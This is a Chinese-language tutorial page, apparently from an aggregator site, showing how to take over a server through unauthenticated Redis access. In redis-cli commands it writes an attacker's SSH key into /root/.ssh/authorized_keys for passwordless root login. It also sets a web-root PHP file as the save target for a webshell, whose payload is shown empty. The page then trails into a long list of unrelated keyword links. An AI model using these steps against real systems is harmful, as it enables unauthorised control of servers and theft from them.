Redis未授权访问导致服务器被控制
发表于:2025-12-03 作者:千家信息网编辑
千家信息网最后更新 2025年12月03日,通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!首先使用下列命令安装Redis tools:root@kali:~# apt-get install r
千家信息网最后更新 2025年12月03日Redis未授权访问导致服务器被控制
通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!
首先使用下列命令安装Redis tools:
root@kali:~# apt-get install redis-tools
然后通过下列命令看是否是未授权访问:
root@kali:~# redis-cli -h 10.198.131.110.198.131.1:6379>
然后我们可以使用免密登录的方式进行相关***:
生成公钥:
root@lsy:~/.ssh# ssh-keygen -t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#
将公钥写入远程服务器:
root@lsy:~/.ssh# redis-cli -h 10.198.131.110.198.131.1:6379> CONFIG SET dir /root/.ssh/OK10.198.131.1:6379> CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"OK10.198.131.1:6379> saveOK10.198.131.1:6379> exit
使用ssh远程登录:
root@lsy:~/.ssh# ssh 10.198.131.1
免密登录成功:

上传webshell
#redis-cli -h 192.168.2.5 -p 6379192.168.2.5:6379>config set dir /var/wwww/html192.168.2.5:6379>config set dbfilename 1.php192.168.2.5:6379>set webshell ""192.168.2.5:6379>save
登录
服务
公钥
命令
服务器
成功
方式
端口
尝试
生成
控制
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
iso9001网络安全认证
天津网络技术服务工程
数据库5.7版本
服务器网口回环测试
江西营销软件开发
单位网络安全总结报告
服务器闪退再进黑屏
远程关闭linux服务器
网络安全的国内外研究
魔兽tbc服务器公会排名
财经网站和经济研究数据库网站
金苗系统如何更改数据库ip地址
数据库和程序哪个难
网络安全法关于消防的规定
数据库完整性约束的功能
做软件开发掉头发
公益网络安全官荣誉证书
数据库还原3154错误
阿里云服务器客服联系
无锡应用软件开发代码
怎么找奥奇传说的服务器
描述数据库全体数据全局逻辑结构
数据库科学与技术有什么用
家庭装饰设计软件开发
谁能推荐我的世界服务器
湖南服务器硬盘测评
沈阳软件开发定制哪家公司好
衢州专业网络安全准入控制价格
网络安全arp欺骗实验步骤
服务器网关错误请稍后再试